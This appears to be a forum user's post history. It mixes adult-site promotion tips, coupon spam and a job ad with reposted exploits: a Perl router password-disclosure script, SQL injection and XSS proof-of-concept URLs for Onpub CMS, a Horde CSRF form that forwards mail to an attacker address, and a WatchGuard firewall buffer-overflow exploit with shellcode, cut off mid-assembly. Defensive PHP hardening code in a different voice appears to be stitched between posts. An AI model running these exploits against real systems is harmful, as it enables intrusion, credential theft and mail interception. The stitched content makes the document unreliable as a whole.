
Gonzalez

Active Members
  • Posts: 1576
  • Joined
  • Last visited
  • Days Won: 9

Posts posted by Gonzalez

  1. A thing or two:

    Adult video download -> upload to xvideos/pornhub with the clip's title followed by your domain. Or put a watermark in the clip.

    Torrent sites -> upload the clip with the watermark

    xhamster doesn't accept watermarks -> put a clip of a few seconds with your domain in front of and after your clip (like brazzers does) but don't add a watermark.

    The pornhub and brazzers networks have the same owner: mindgeek.com - as far as I know.

  2. How I make 1k thru Freelancing

    /make-1k-on-the-side-thru-freelancing/?couponCode=UdemyStudioFans

    How I Got My Book to #1 on Amazon with ZERO Marketing $$

    /how-i-got-my-book-to-1-on-amazon-with-zero-marketing/?couponCode=UdemyStudio

  3. Hi guys,

    I'm looking for someone dedicated who is interested in working from home.

    You will help us promote the site in various ways; I will teach you personally.

    Recommended:

    - PC - good experience

    - Good internet connection (10Mbit+)

    - dedicated to the work

    Working hours are 6 hours a day, every day except Sunday.

    Payment is made every week via PayPal - $65 USD

    PS: some of the sites contain adult material.

    Thanks, and I await a PM from those interested.


  4. #!/usr/bin/perl
    #Author: Sebastián Magof
    #Vulnerable file: wansinglecfg.cmd
    #Bug: Password Disclosure
    # (\/)
    # (**) ?lpha
    #(")(")
    #usage:perl exploit.pl
    use LWP::UserAgent;
    use HTTP::Request;
    #begin
    print "\n\n*******************************************************\n";
    print "* Pirelli Discus ADSL DRG A125g password disclosure *\n";
    print "*******************************************************\n\n";
    print "[+] Type your Gateway. (#default gateway 10.0.0.2) : "; #10.0.0.2 default Gateway
    $gateway =<STDIN>;

    #pwd disclosure file
    my $url = "http://$gateway/wansinglecfg.cmd?action=view";

    #UserAgent
    my $ua = LWP::UserAgent->new();
    $ua->agent("Mozilla/5.0");

    #Request.
    my $req = HTTP::Request->new(GET => $url);
    my $request = $ua->request($req);
    my $content = $request->content(); #content
    my ($usr) = $content =~ m/frmLoad\('(.+)', '/;
    my ($pwd) = $content =~ m/$usr', '(.+)',/;

    #usr+pwd;
    print "User: $usr\nPassword: $pwd\n\n";
    exit(0);

    __EOF__

    -Gonzalez


  5. Document Title:
    ===============
    Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities


    References (Source):
    ====================
    http://www.vulnerability-lab.com/get_content.php?id=1120


    Release Date:
    =============
    2013-10-26


    Vulnerability Laboratory ID (VL-ID):
    ====================================
    1120


    Common Vulnerability Scoring System:
    ====================================
    8.2


    Product & Service Introduction:
    ===============================
    Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
    looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
    stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub's default
    design and functionality via open-standard web development tools and techniques.

    Onpub is ideal for those with no desire to implement a CMS from scratch, but still need a custom, yet agile solution.
    Onpub tightly integrates many widely used third-party web apps and scripts in to one coherent system to build further upon.

    ( Copy of the Vendor Homepage: http://onpub.com/ )


    Abstract Advisory Information:
    ==============================
    The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application.


    Vulnerability Disclosure Timeline:
    ==================================
    2013-10-26: Public Disclosure (Vulnerability Laboratory)


    Discovery Status:
    =================
    Published


    Affected Product(s):
    ====================
    Onpub
    Product: Onpub - Content Management System 1.4 Lite and 1.5


    Exploitation Technique:
    =======================
    Remote


    Severity Level:
    ===============
    Critical


    Technical Details & Description:
    ================================
    1.1
    Multiple remote sql injection web vulnerabilities are detected in the official Onpub v1.4 and 1.5 Content Management System web-application.
    The vulnerability allows remote attackers to inject their own sql commands without authorization to compromise the web-application or the web-server dbms.

    The sql injection vulnerabilities are located in the `websiteID`,`imageID`,`keywords`,`orderBy`,`order` and `articleID` values of the index.php file.
    Remote attackers are able to inject own sql commands via GET method request to compromise the database management system or cms web-application.
    The inject can be done by usage of the manage path via GET method request or by usage of the articleID in the index.php file POST method request.
    The severity of the remote sql injection bugs is estimated as critical.

    Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
    Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.


    Vulnerable Module(s):
    [+] Manage

    Vulnerable File(s):
    [+] index.php

    Vulnerable Parameter(s):
    [+] websiteID
    [+] imageID
    [+] keywords
    [+] orderBy
    [+] order
    [+] articleID



    2.1
    A client-side post inject web vulnerability is detected in the official Onpub v1.4 and v1.5 Content Management System web-application.
    The vulnerability allows remote attackers to manipulate web-application to browser requests (client-side) via POST method.

    The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module).
    Remote attackers can manipulate the `page` parameter in the `index.php` file via GET method request to compromise client-side application context.

    Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing,
    client-side unauthorized external redirects and client-side manipulation of the contact form module context.


    Vulnerable Module(s):
    [+] Manage

    Vulnerable File(s):
    [+] index.php

    Vulnerable Parameter(s):
    [+] page



    Proof of Concept (PoC):
    =======================
    1.1
    The sql injection web vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction.
    For demonstration or to reproduce ...

    PoC:
    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION VULNERABILITY!]&order=ASC
    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&orderBy=title&order=[SQL-INJECTION VULNERABILITY!]
    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImage&imageID=2%27a[SQL-INJECTION VULNERABILITY!]
    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticle&articleID=1%20[SQL-INJECTION VULNERABILITY!]


    onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@version--
    onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@database--
    onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@user--





    2.1
    The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account
    and with low user interaction click. For demonstration or to reproduce ...


    PoC:
    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=2%27%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

    http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=137%20>"<iframe%20src=http://www.vulnerability-lab.com>


    Solution - Fix & Patch:
    =======================
    1.1
    Parse in the index.php file the vulnerable `websiteID`,`imageID`,`keywords`,`articleID`,`orderBy`,`order` parameters.
    Use the mysql_real_escape_string() or a prepared statement to prevent sql injection attacks.

    2.1
    Parse or encode the vulnerable page parameter in the index.php file to prevent client-side cross site scripting attacks.


    Security Risk:
    ==============
    1.1
    The security risk of the remote sql injection web vulnerabilities is estimated as critical.

    1.2
    The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).


    Credits & Authors:
    ==================
    Vulnerability Laboratory [Research Team] - Marcel Bernhardt (smash@evolution-sec.com)
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


    Disclaimer & Information:
    =========================
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
    either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
    Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
    profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
    states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
    may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
    or trade with fraud/stolen material.

    Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
    Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
    Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
    Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
    Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
    Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
    media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
    other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
    modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



    --
    VULNERABILITY LABORATORY RESEARCH TEAM
    DOMAIN: www.vulnerability-lab.com
    CONTACT: research@vulnerability-lab.com

    -Gonzalez
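As an added illustration of the advisory's "Solution - Fix & Patch" section, and not Onpub's own code: PHP that puts the concatenation pattern the advisory describes next to a prepared-statement version for the numeric id parameters (`websiteID`, `imageID`, `articleID`) and for `keywords`, an allow-list for `orderBy`/`order` (an identifier and a keyword cannot be bound as placeholders, so escaping does nothing for them), and casting plus output encoding for the reflected `page` parameter. Table and column names, the in-memory SQLite database used by `demo()` and its sample rows are assumptions made for the example.

```php
<?php
// Added example, not Onpub's own code: the advisory's fix applied to the
// parameters it names, using PDO prepared statements. Table and column
// names (websites, articles, ID, title, created) are assumptions.

declare(strict_types=1);

// Vulnerable pattern, kept only for contrast and never executed here: the raw
// GET value is concatenated into the statement, so a quote inside websiteID
// closes the string literal and the remainder of the value is parsed as SQL.
function vulnerableWebsiteQuery(string $websiteID): string
{
    return "SELECT * FROM websites WHERE ID = '" . $websiteID . "'";
}

// Hardened: the value travels as a bound parameter and is never parsed as SQL.
function fetchWebsite(PDO $db, string $websiteID): ?array
{
    $stmt = $db->prepare('SELECT * FROM websites WHERE ID = :id');
    $stmt->bindValue(':id', (int) $websiteID, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// orderBy is an identifier and order is a keyword; neither can be a
// placeholder, so both are reduced to an allow-list with a safe default.
const ORDER_BY_ALLOWED = ['ID', 'title', 'created'];
const ORDER_ALLOWED    = ['ASC', 'DESC'];

function safeOrderClause(string $orderBy, string $order): string
{
    if (!in_array($orderBy, ORDER_BY_ALLOWED, true)) {
        $orderBy = 'ID';
    }
    $order = strtoupper($order);
    if (!in_array($order, ORDER_ALLOWED, true)) {
        $order = 'ASC';
    }
    return "ORDER BY `$orderBy` $order";
}

// keywords is bound as a LIKE pattern. Binding stops injection; '%' and '_'
// in the input still act as wildcards, which is a matching concern, not SQL.
function searchArticles(PDO $db, string $keywords, string $orderBy, string $order): array
{
    $sql  = 'SELECT ID, title FROM articles WHERE title LIKE :kw ' . safeOrderClause($orderBy, $order);
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':kw', '%' . $keywords . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// page is reflected into HTML. It is numeric by design, so cast it; whatever
// must be echoed as text goes through htmlspecialchars().
function renderPageLink(string $page): string
{
    $n = max(1, (int) $page); // non-numeric input collapses to page 1
    return '<a href="index.php?onpub=EditImages&amp;page=' . $n . '">'
        . htmlspecialchars('Page ' . $n, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</a>';
}

// Constructed demo on an in-memory SQLite database (no Onpub install needed).
function demo(): array
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE websites (ID INTEGER PRIMARY KEY, name TEXT)');
    $db->exec('CREATE TABLE articles (ID INTEGER PRIMARY KEY, title TEXT, created TEXT)');
    $db->exec("INSERT INTO websites VALUES (1, 'main site')");
    $db->exec("INSERT INTO articles VALUES (1, 'Hello world', '2013-10-26'), (2, 'Second post', '2013-10-27')");

    // Inputs shaped like the advisory's PoC values (constructed for the demo).
    $injected = "-1' union select 1,2,3--";
    return [
        'injected_id'  => fetchWebsite($db, $injected),
        'legit_id'     => fetchWebsite($db, '1')['name'] ?? null,
        'order_clause' => safeOrderClause("-1'", 'desc'),
        'search_hits'  => count(searchArticles($db, 'post', 'title', 'junk')),
        'page_link'    => renderPageLink('2\'"<script>alert(1)</script>'),
    ];
}

print_r(demo());
```

Run it with the `php` CLI; the in-memory database means no real install is touched. The `orderBy`/`order` case is the one the advisory's `mysql_real_escape_string()` suggestion does not cover: escaping a string is meaningless in an identifier or keyword position, so those two parameters need an allow-list whichever driver is used.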


  6. #############################
    Exploit Title : Multiple CSRF Horde Groupware Web mail Edition
    Author:Marcela Benetrix
    Date: 10/25/13
    version: 5.1.2
    software link:http://www.horde.org/apps/webmail

    #############################
    GroupWare Web mail Edition

    Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project.

    ##########################
    CSRF Location

    Several functionalities from the Rules section were found to be missing the token that prevents CSRF.


    ##########################
    POC

    A <body>
    <form action="...../horde/ingo/basic.php?page=rule" method="POST">
    <input type="hidden" name="actionID" value="rule_save" />
    <input type="hidden" name="conditionnumber" value="-1" />
    <input type="hidden" name="name" value="TestingCSRF" />
    <input type="hidden" name="combine" value="1" />
    <input type="hidden" name="field[0]" value="From" />
    <input type="hidden" name="match[0]" value="contains" />
    <input type="hidden" name="value[0]"
    value="test@hotmail.com" />
    <input type="hidden" name="field[1]" value="" />
    <input type="hidden" name="action" value="4" />
    <input type="hidden" name="actionvalue"
    value="attacker@hotmail.com" />
    <input type="hidden" name="stop" value="1" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

    These were found at:
    * Creating a rule
    * Updating
    * Enabling
    (http://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=2&actionID=rule_enable)
    * Deleting ( url-based https://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=6&actionID=rule_delete)

    ###########################
    CVE identifier

    CVE-2013-6275.
    ##########################
    Vendor Notification
    10/25/2013 to: the developers. They replied immediately and fixed the problem launching a patch: http://bugs.horde.org/ticket/12796
    10/28/2013: Disclosure

    -Gonzalez
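An added example, not Horde or Ingo code: a synchronizer-token check in PHP covering the three handlers the post lists (`rule_save`, `rule_enable`, `rule_delete`). The session array, the rule store, the function names and the outcome strings are assumptions made for the demo; the forged request inside `demo()` reuses the field names from the PoC form above.

```php
<?php
// Added example, not Horde/Ingo code: a synchronizer-token check of the kind
// the rules handlers above were missing. Function names, the session array
// and the rule store are assumptions made for the demo.

declare(strict_types=1);

// Return the session's CSRF token, minting one on first use.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every state-changing form (rule create/update).
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '" />';
}

// True only for a POST carrying a token equal to the session's, compared in
// constant time. GET never qualifies, so the url-based enable/delete links
// from the post cannot change state until they become token-bearing forms.
function csrfValid(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false; // no token issued yet, or csrf_token[] submitted as an array
    }
    return hash_equals($expected, $given);
}

// Dispatcher for the actionIDs named in the post; returns the outcome so it
// can be exercised without a web server.
function handleRuleAction(array &$session, string $method, array $post, array &$rules): string
{
    if (!csrfValid($session, $method, $post)) {
        return 'rejected';
    }
    $n = (int) ($post['rulenumber'] ?? -1);
    switch ($post['actionID'] ?? '') {
        case 'rule_save':
            $rules[] = ['name' => (string) ($post['name'] ?? ''), 'enabled' => true];
            return 'saved';
        case 'rule_enable':
            if (!isset($rules[$n])) {
                return 'no such rule';
            }
            $rules[$n]['enabled'] = true;
            return 'enabled';
        case 'rule_delete':
            if (!isset($rules[$n])) {
                return 'no such rule';
            }
            unset($rules[$n]);
            return 'deleted';
        default:
            return 'unknown action';
    }
}

// Constructed demo: the forged POST from the PoC (no token) and a url-style
// GET delete are rejected; the same fields sent from a form that carries the
// session token are accepted.
function demo(): array
{
    $session = [];
    $rules   = [];
    $forged  = ['actionID' => 'rule_save', 'name' => 'TestingCSRF',
                'action' => '4', 'actionvalue' => 'attacker@hotmail.com'];
    $results = [];
    $results[] = handleRuleAction($session, 'POST', $forged, $rules);
    $results[] = handleRuleAction($session, 'GET', ['actionID' => 'rule_delete', 'rulenumber' => '0'], $rules);
    $legit     = $forged + ['csrf_token' => csrfToken($session)];
    $results[] = handleRuleAction($session, 'POST', $legit, $rules);
    $results[] = handleRuleAction($session, 'POST',
        ['actionID' => 'rule_delete', 'rulenumber' => '0', 'csrf_token' => csrfToken($session)], $rules);
    $results[] = count($rules);
    return $results;
}

print_r(demo());
```

The url-based enable and delete links named in the post need to become token-bearing POST forms rather than plain links: a token placed in a GET URL leaks through the Referer header and browser history, and the handler above refuses GET outright. Embed `csrfField($_SESSION)` in each form and keep the comparison on `hash_equals()` so the check is not timing-dependent.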


  7. #!/usr/bin/perl -w
    # Exploit Title: WatchGuard Firewall XTM version 11.7.4u1 - Remote buffer overflow exploit ~ sessionid cookie
    # Date: Oct 18 2013
    # Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
    # Vendor Homepage: http://www.watchguard.com
    # Version: <= 11.7.4u1
    # Tested on: XTMv
    # CVE : CVE-2013-6021

    =header
    *********************************************************************
    ** WatchGuard Firewall XTM version 11.7.4u1 **
    ** Remote buffer overflow exploit ~ sessionid cookie **
    *********************************************************************
    ** **
    ** Author: jerome.nokin@gmail.com **
    ** Blog: http://funoverip.net **
    ** CVE: CVE-2013-6021 **
    ** **
    *********************************************************************
    ** **
    ** - Bug, exploit & shellcode details available on: **
    ** http://funoverip.net/?p=1519 **
    ** **
    ** - Decoded shellcode can be found at the end of this file **
    ** **
    *********************************************************************
    =cut


    =output sample

    [*] Sending HTTP ping request to https://192.168.60.200:8080 : OK. Got 'pong'
    [*] Checking sessionid cookie for bad chars
    [*] Checking shellcode for bad chars
    [*] Heap messaging (request 1) : ...
    [*] Sending authentication bypass shellcode (request 2)
    [*] HTTP Response :

    --------------------------------------------------------------------------------
    HTTP/1.1 200 OK
    Content-type: text/xml
    Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014
    Date: Sun, 27 Oct 2013 21:11:38 GMT
    Server: none
    Content-Length: 751

    <?xml version="1.0"?>
    <methodResponse>
    <params>
    <param>
    <value>
    <struct>
    <member><name>sid</name><value>6B8B4567327B23C6643C98696633487300000014</value></member>
    <member><name>response</name><value></value></member>
    <member>
    <name>readwrite</name>
    <value><struct>
    <member><name>privilege</name><value>2</value></member>
    <member><name>peer_sid</name><value>0</value></member>
    <member><name>peer_name</name><value>error</value></member>
    <member><name>peer_ip</name><value>0.0.0.0</value></member>
    </struct></value>
    </member>
    </struct>
    </value>
    </param>
    </params>
    </methodResponse>
    --------------------------------------------------------------------------------

    [*] Over.
    =cut

    use warnings;
    use strict;
    use IO::Socket::SSL;

    # host and port of the XTM web console
    my $host = "192.168.60.200";
    my $port = "8080";

    # Shellcode (watch out bad chars)
    my $shellcode =
    # shellcode: bypass password verification and return a session cookie
    "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQ" .
    "KusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUX" .
    "eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" .
    "9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" .
    "RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" .
    "sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" .
    "ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" .
    "benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" .
    "LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A";

    # Shellcode max length
    my $shellcode_max_len = 2000;


    # set our shellcode address into EAX (expected by alpha2 encoder)
    my $alpha2_ecx24 =
    "\x8b\x41\x24" . # mov eax, [ecx+0x24]
    "\x29\xd0" . # sub eax, edx ; (edx is updated by nopsled)
    "\x83\xc0\x40" . # add eax, 0x40
    "\x83\xe8\x35"; # sub eax, 0x35
    # for the reader, "add eax, edx" contains bad chars.
    # This is the reason why the nopsled decrement EDX and that we use "dec eax, edx"


    # flush after every write
    $| = 1;

    # HTTP POST data for authentication request
    my $login_post_data =
    "<methodCall><methodName>login</methodName><params><param><value><struct><member>" .
    "<name>password</name><value><string>foo</string></value></member><member>" .
    "<name>user</name><value><string>admin</string></value></member></struct></value>" .
    "</param></params></methodCall>";

    # list of bad characters
    my @badchars = (
    "\x00",
    "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a",
    "\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13",
    "\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c",
    "\x1d", "\x1e", "\x1f",
    "\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters
    );


    # function: Check input for badchars.
    sub check_badchars {
    my $in = shift;
    my $stop = 0;
    for(my $i=0; $i<length($in); $i++){
    my $c = substr($in,$i,1);
    if($c ~~ @badchars){
    printf " - bad char '0x%02x' found\n", ord($c);
    $stop = 1;
    }
    }
    if($stop){ exit; }
    }

    # function: testing remote connectivity with the appliance
    # send HTTP "ping" request and expect "pong" reply
    sub testing_connectivity {

    print "[*] Sending HTTP ping request to https://$host:$port : ";
    my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";

    if($sock){
    my $req =
    "GET /ping HTTP/1.0\r\n" .
    "Host:$host:$port" . "\r\n" .
    "\r\n";

    # send ping
    print $sock $req;
    my $resp='';
    my $pong = 0;
    # read answer
    while (my $line = <$sock>){
    if($line =~ /pong/) { $pong = 1;}
    $resp .= $line;
    }
    # got pong ?
    if($pong){
    print "OK. Got 'pong'\n";
    }else{
    print "ERROR. Expecting 'pong' response but received :\n";
    print $resp;
    exit;
    }
    close $sock;
    }else{
    print "ERROR: Socket failed !\n";
    exit;
    }
    }


    # function: HTTP request used for HEAP messaging phase
    sub building_request_step1 {
    my $sessionid = "A" x 120; # do not overflow now
    my $req =
    "POST /agent/ping HTTP/1.1\r\n" .
    "Host:$host:$port" . "\r\n" .
    "User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 " . "a" x 100 . "\r\n" .
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" .
    "Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" .
    "Cookie: sessionid=" . $sessionid . "\r\n" .
    "Accept-Charset: utf-8\r\n" .
    "Content-Type: application/xml\r\n" .
    "Content-Length: 3\r\n" .
    "\r\n" .
    "foo" ;
    return $req;
    }

    # function: HTTP request used for buffer overflow exploitation
    sub building_request_step2 {

    my $sessionid =
    "A" x 140 . # junk
    "\x44\x85" ; # off by 2 overflow to reach 0x8068544 (on the heap).
    # 0x8068544 contains a "good memory chunk" which satisfy all rules

    print "[*] Checking sessionid cookie for bad chars\n";
    check_badchars($sessionid);

    my $req =
    "POST /agent/ping HTTP/1.1\r\n" .
    "Host:$host:$port" . "\r\n" .
    "User-Agent: " . "a" x 1879 . "\r\n" .
    "Connection: keep-alive" . "a" x 22 .
    "\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24)) . # nops
    $alpha2_ecx24 . # set EAX to shellcode addr
    $shellcode . # shellcode
    "\r\n" .
    "Accept-Encoding: identity," . "b" x 1386 . "\r\n" .
    "Cookie: sessionid=" . $sessionid . "\r\n" .
    "Accept-Charset: utf-8\r\n" .
    "Content-Type: application/xml\r\n" .
    "Content-Length: " . length($login_post_data). "\r\n" .
    "\r\n" .
    $login_post_data ;

    return $req;
    }

    # function: Send an HTTP request.
    sub send_http_request {

    my $req = shift;
    my $read_answer = shift || 0;
    my $http_resp='';

    # Open socket
    my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";

    if($sock){
    print $sock $req;

    # do we need the answer ?
    if ($read_answer){
    my $is_chunked = 0;
    my $is_body = 0;
    while(my $line = <$sock>){

    if($line =~ /Transfer-Encoding: chunked/){
    $is_chunked = 1;
    next;
    }

    if($line eq "\r\n"){
    # we reached the body
    if($is_chunked){
    $line = <$sock>; # chunk length
    $line =~ s/\r\n//g;
    $sock->read(my $data, hex($line)); # read chunk
    $http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line);
    $http_resp .= $data;
    close $sock ;
    return $http_resp;
    }
    }

    $http_resp .= $line;
    }
    }
    close $sock;
    }else{
    print "ERROR: Socket failed !\n";
    exit;
    }
    return $http_resp;
    }



    ### MAIN ####


    # print banner
    print << 'EOF';
    **********************************************************
    ** WatchGuard Firewall XTM version 11.7.4u1 **
    ** Remote buffer overflow exploit ~ sessionid cookie **
    **********************************************************
    ** **
    ** Author: jerome.nokin@gmail.com **
    ** Blog: http://funoverip.net **
    ** CVE: CVE-2013-6021 **
    ** **
    **********************************************************
    ** **
    ** Bug, exploit & shellcode details available on: **
    ** http://funoverip.net/?p=1519 **
    ** **
    **********************************************************

    EOF


    # Send an HTTP ping request
    testing_connectivity();

    # building HTTP requests
    my $request_step1 = building_request_step1();
    my $request_step2 = building_request_step2();

    # Testing shellcode against bad chars
    print "[*] Checking shellcode for bad chars\n";
    check_badchars($shellcode);

    # Filling the heap
    print "[*] Heap messaging (request 1) : ";
    for(my $i=0 ; $i<3 ; $i++){
    send_http_request($request_step1);
    print ".";
    }
    print "\n";

    # Exploiting
    print "[*] Sending authentication bypass shellcode (request 2)\n";
    my $resp = send_http_request($request_step2,1);
    print "[*] HTTP Response : \n\n";

    print "-" x 80 . "\n";
    print $resp;
    print "-" x 80 . "\n\n";


    print "[*] Over.\n";
    exit;


    =shellcode
    ;------------------------------------------------
    ; shellcode-get-gession.asm
    ; by Jerome Nokin for XTM(v) 11.7.4 update 1
    ;------------------------------------------------

    global _start
    _start:


    ; current EBP/ESP values
    ;-------
    ; esp 0x3ff0b518
    ; ebp 0x3ff0b558


    ; first, fix the stack in HTTP_handle_request function
    ; -------
    ; esp 0x3ff0b6f0
    ; ebp 0x3ffffcb8

    ; we'll do
    ;---------
    ;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472'
    ; 3ff0b6f0
    ; ESP = ESP + 472
    ;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312'
    ; 3ffffcb8
    ; EBP = EBP + 1001312

    ; fix ESP/EBP
    add esp, 472
    add ebp, 1001312


    ; fixing overwritten ptrs


    ; finding initial malloc pointer v50 (overwritten)
    ; 0805f000-08081000 rwxp 00000000 00:00 0 [heap]

    ; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14)

    ; example inside gdb
    ;b *0x8051901
    ;b *0x80519c0
    ;(gdb) x/xw $ebp-0xf8 <===== v55
    ;0x3ffffbc0: 0x08065b90
    ;(gdb) x/xw $ebp-0xfc <===== v54
    ;0x3ffffbbc: 0x08067fe0
    ;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90 <==== search seq on heap
    ;0x8063b48
    ;1 pattern found.
    ;(gdb) x/xw 0x8063b48-0x10 <==== initial malloc ptr (v50) is at 0x8063b48-0x10
    ;0x8063b38: 0x00000001

    ; search this sequence on the heap
    mov eax, [ebp-0xfc] ; v54
    mov ebx, [ebp-0xf8] ; v55

    mov edi, 0x0805f000 ; heap start addr
    loop:
    add edi, 4
    lea esi, [edi+4]
    cmp esi, 0x08081000 ; edi is out of the heap ?
    je loop_end
    cmp [edi], eax ; cmp v54
    jne loop
    cmp [edi+4], ebx ; cmp v55
    je found
    jmp loop

    loop_end:
    mov eax, 0x08063b38 ; default value (should not be reached)

    found:
    lea eax, [edi-0x10] ; eax = v50 address (malloc ptr addr)

    ; EBP-0x10c
    ; saved content of v50 (malloc) = ebp-0x10c
    mov [ebp-0x10c], eax

    ; reset EBX (see following)
    ; 805185c: e8 95 43 00 00 call 8055bf6 <wga_signal+0x784>
    ; 8051861: 81 c3 93 c7 00 00 add ebx,0xc793
    ; ....
    ; 8055bf6: 8b 1c 24 mov ebx,DWORD PTR [esp]
    ; 8055bf9: c3 ret
    mov ebx, 0x805dff4

    ; EBP-0x108
    ; just reset it to 0
    mov dword [ebp-0x108], 0x0

    ; EBP-0x100
